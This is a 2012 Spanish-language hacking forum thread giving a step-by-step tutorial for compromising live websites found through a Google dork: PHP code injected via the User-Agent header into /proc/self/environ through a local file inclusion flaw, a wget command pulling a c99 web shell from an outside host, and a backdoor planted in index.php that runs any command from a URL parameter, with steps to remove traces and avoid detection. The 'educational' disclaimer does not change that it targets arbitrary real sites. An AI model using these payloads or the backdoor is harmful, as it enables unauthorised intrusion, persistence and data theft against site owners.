send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdoorizar

  • 1 Respuestas
  • 2111 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« en: Julio 16, 2012, 09:11:15 pm »
Leyendo el Post de CalebBuker sobre LFI atrasves de php://input
desidi hacer un tutorial de otro metodo para concegir subir una shell por medio de LFI
utilizando injecciones php atraves de una vulnerabilidad en el /proc/self/environ
Empecemos:

Primero Buscamos con un dork alguna web Vulnerable a LFI

Dork:

inurl:*.php?page=* site:.com.ar

Vamos probando hasta encontrar una q al incluir /etc/passwd nos muestra su contenido
En este caso:

You are not allowed to view links. Register or Login



Damos como parametro a incluir /proc/self/environ y vemos el siguien resultado

You are not allowed to view links. Register or Login



Nos vamos a Mozilla Firefox y abrimos el addon Tamper Data:

Damos clik en Start Tamper y volvemos a realizar la Peticion al sitio web

Atrapa el Primer "pakete" y nos sale el siguiente cartel



Desactivamos la casilla "Continue Tampering" y Damos Click en Tamper, modificamos el Parametro User-Agent intrudiciendo algun Codigo php, de Prueba, Yo intentare con <? System('ls'); ?> para ver si logramos listar el contenido de host.



Damos Click en OK y vemos q el codigo php se ejecuta correctamente y lista los archivos y directorios de la web Vulnerable:



Ahora Sabemos que se puede ejecutar Codigo Shell atraves de php con el comando system,exec,etc (si no funcionace reciviriamos un mensaje diciendo q la funcion system() a sido deshabilitada por razones de seguridad)

Subiremos Nuestra Shell, de la siguiente forma.

Abriremos Tamper Data y comensaremos a Capturar.
Repetiremos la Peticion al host:
You are not allowed to view links. Register or Login
Modificaremos el Parametro User-Agent para que ejecute Wget y descarge una shell en txt de donde sea que este alojada con el siguiente codigo php

<? system('wget You are not allowed to view links. Register or Login ?>



Repetimos la Operacion Con Tamper Data y Comprobamos q nuestra shell se subio correctamente pasando como parametro en User-Agent

<? system('ls'); ?>

Vemos que dentro de la lista de archivos del host aparece nuestra shell



Convertiremos Nuestro txt, en un archivo php, repitiendo la operacion con Tamper Data y pasando como Parametro de User-Agent

<? system('mv c99.txt s.php'); ?>

Una ves Hecho Esto repetimos el procedimiento con tamper data para listar nuestros archivos, para ver si el proceso anterior Termino Correctamente:

<? system('ls'); ?>



Como vemos el archivo fue Renombrado Correctamente, solo nos queda vistar nuestro archivo por medio de la URL

You are not allowed to view links. Register or Login

)

Como vemos la ejecucion de la shellphp, se ejecuto Correctamente. Como es un Sitio Importante y no queremos q nos detecten, introduciremos un backdoor dentro del codigo de algun archivo, yo elegi index.php



Les Dejo el code del backdoor q arme:

Código: You are not allowed to view links. Register or Login
<?php
if($_GET['active']=='si'){
system$_GET['c']);
}
?>

Lo Introduciremos dentro de index.php y al llamarlo desde

You are not allowed to view links. Register or Login

nos mostrara el resultado de la ejecucion del parametro q pasemos.



Solo nos queda Eliminar s.php con el comando rm s.php por medio de nuestro backdoor

You are not allowed to view links. Register or Login s.php&active=si

Listamos el Contenido del Host

You are not allowed to view links. Register or Login

y vemos q s.php ha desaparecido.



Espero que este tutorial les halla servido, HD_Breaker

Renuncia: No me hago Responsable del Uso que le den a este tutorial, su contenido es puramente educativo
« Última modificación: Noviembre 23, 2014, 01:03:52 pm por Expermicid »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #1 en: Julio 17, 2012, 12:35:31 am »
Con un RFI solo es necesario tener un archivo con una WebShell en algun servidor para llamarlo directamente desde el RFI.

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



Shell-Save_1.0 [Administra de manera mas eficiente tus webshells online]

Iniciado por q3rv0

Respuestas: 9
Vistas: 3532
Último mensaje Abril 14, 2013, 05:34:46 am
por s3cur1tyr00t
Una noche con PrestaShop [anécdota][shell-upload]

Iniciado por Xt3mP

Respuestas: 5
Vistas: 4165
Último mensaje Julio 18, 2012, 06:39:49 pm
por Xt3mP
HTTP METHODS: Subiendo Shell mediante PUT

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2108
Último mensaje Febrero 24, 2010, 03:07:58 pm
por dracko.rx
[Video-Tutorial] Bypassing an uploader to get shell.

Iniciado por Xt3mP

Respuestas: 0
Vistas: 1222
Último mensaje Julio 21, 2010, 07:38:59 pm
por Xt3mP
Intrusión a un Servidor Por SQLi y Obtener shell

Iniciado por hdbreaker

Respuestas: 11
Vistas: 4205
Último mensaje Julio 15, 2012, 09:12:22 am
por عя ҜΔŁĬ